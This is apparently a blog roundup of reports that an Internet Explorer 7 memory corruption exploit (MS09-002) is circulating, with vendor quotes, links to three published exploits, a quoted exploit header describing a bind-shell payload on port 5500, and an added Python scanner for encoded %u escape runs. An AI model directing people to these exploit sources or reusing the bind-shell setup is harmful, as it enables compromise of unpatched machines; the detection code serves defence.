MS09-002 exploit in the wild: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
An exploit for MS09-002 is out!!! (There was an article saying it is dangerous unless you update IE as well!)
Several AV vendors reported about MS09-002 exploits in the wild. We can confirm this: the exploit for the CVE-2009-0075 vulnerability (Uninitialized Memory Corruption) in Internet Explorer 7 is definitely in the wild and working like a charm on an unpatched Windows XP machine.
InfoSec Handlers Diary Blog - MS09-002 exploit in the wild
It seems it is also being distributed as malware. However, it is only Base64-encoded, so reportedly it can be detected easily.
Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.
McAfee Threat Center – Latest Cyberthreats | McAfee
The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.
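An added example, not from the original post or from any vendor: a scanner that flags long `%uXXXX` runs both in the raw page and inside base64 blobs, since base64 only hides the pattern from a literal string match. The thresholds, function names and sample strings are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Assumed thresholds (not from the page): 8+ consecutive %uXXXX escapes is
# treated as suspicious, and base64 candidates must be at least 40 chars.
PCT_U_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4}){8,}")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def scan(text, max_depth=2):
    """Return (layer, escape_count) per %u run; layer 0 is the raw text,
    layer n is text recovered after n rounds of base64 decoding."""
    findings = []
    pending = [(0, text)]
    while pending:
        depth, layer = pending.pop()
        for m in PCT_U_RUN.finditer(layer):
            findings.append((depth, len(m.group(0)) // 6))
        if depth >= max_depth:
            continue  # bound the work on nested or hostile input
        for m in B64_RUN.finditer(layer):
            try:
                raw = base64.b64decode(m.group(0), validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64 (e.g. a long identifier)
            pending.append((depth + 1, raw.decode("latin-1")))
    return sorted(findings)


# Constructed samples: the payload is twelve harmless %u4141 escapes.
_INNER = 'var c=unescape("' + "%u4141" * 12 + '");'
SAMPLE_PLAIN = "<script>" + _INNER + "</script>"
SAMPLE_B64 = ('<script>var p="' + base64.b64encode(_INNER.encode()).decode()
              + '";</script>')
# Two escapes for ordinary text stay below the threshold.
SAMPLE_CLEAN = "<script>var t=unescape('%u65E5%u672C');</script>"

if __name__ == "__main__":
    for name in ("SAMPLE_PLAIN", "SAMPLE_B64", "SAMPLE_CLEAN"):
        print(name, scan(globals()[name]))
```

A finding at layer 1 or deeper means the escape run was only visible after decoding, which is the case a plain signature on the page source would miss.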
Exploits for MS09-002 have been published.
http://www.milw0rm.com/exploits/8082
The second one opens a shell port. Is the encoder Japanese?! > ShikataGaNai
http://www.milw0rm.com/exploits/8080
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
That makes three of them out now.
http://www.milw0rm.com/exploits/8079
Related URLs
- Exploiting a vulnerability fixed in the latest patch: attacks targeting the IE vulnerability emerge - ITmedia Enterprise
- Another Exploit Targets IE7 Bug | TrendLabs | Malware Blog - by Trend Micro
- Attack on the Internet Explorer 7 vulnerability (MS09-002) confirmed (HTML_DLOADER.AS) | Trend Micro Security Blog (Trend Micro Security Blog by virus analysts)
- Exploit Shield protects against new IE7 vulnerability - F-Secure Weblog : News from the Lab
- IE7 exploit in the wild
- Attacks targeting the IE vulnerability appear "as expected", also confirmed in Japan: News
- MS09-002 exploit in the wild
- SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
- MS09-002 Exploit in the Wild - PandaLabs